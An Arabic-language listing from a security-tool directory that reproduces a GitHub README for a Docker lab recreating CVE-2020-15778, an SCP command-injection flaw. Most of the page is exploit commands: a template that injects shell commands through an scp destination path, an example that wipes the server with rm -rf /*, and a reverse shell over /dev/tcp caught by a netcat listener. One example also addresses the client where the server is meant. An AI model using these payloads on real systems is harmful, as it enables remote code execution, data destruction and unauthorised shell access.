Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-15778 — # استنساخ ثغرة CVE-2020-15778 لاستغلال حقن أوامر SCP مع إعداد خادم-عميل قائم على Docker لاختبار تنفيذ الأكواد عن بُعد وحمولات الصدفة العكسية. | Kitploit
أدوات/GitHubGitHub/yifanzhg/cve-2020-15778
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubyifanzhg/cve-2020-15778

CVE-2020-15778

# استنساخ ثغرة CVE-2020-15778 لاستغلال حقن أوامر SCP مع إعداد خادم-عميل قائم على Docker لاختبار تنفيذ الأكواد عن بُعد وحمولات الصدفة العكسية.

عرض المستودع
33منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-15778

مقدمة

يستنسخ هذا المستودع CVE-2020-15778.

الخطوات

  1. قم ببناء صور docker لخادم scp والعميل
root@kitploit:~
cd client
docker build -t client-cve .
root@kitploit:~
cd server
docker build -t server-cve .
  1. شغّل خادم scp داخل الحاوية.
root@kitploit:~
docker run -d -P --name scp-server server-cve

استرجع عنوان IP الداخلي لخادم scp عن طريق

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
  1. شغّل العميل داخل الحاوية.
root@kitploit:~
docker run --name scp-client -i -t client-cve
  1. احقن أمر shell الخاص بك إلى خادم scp عن طريق استدعاء أمر scp في العميل.

في طرفية العميل، نفّذ

root@kitploit:~
scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'

كلمة المرور هي "PASSWORD".

أمثلة

فيما يلي بعض الأمثلة على هذا الاستغلال.

  1. احذف كل شيء في الخادم لتعطيله.
root@kitploit:~
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
  1. اعكس bash الخاص بخادم scp إلى العميل (محاكاة ssh).

استمع إلى منفذ على جهاز العميل.

root@kitploit:~
nc -lvvp 8080

استخدم scp لإجبار الخادم على توجيه bash التفاعلي إلى جهاز العميل.

root@kitploit:~
scp nil.txt root@<internal IP of scp client>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'

يمكن استرجاع عنوان IP الخاص بالعميل عن طريق

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
تنزيل الأداة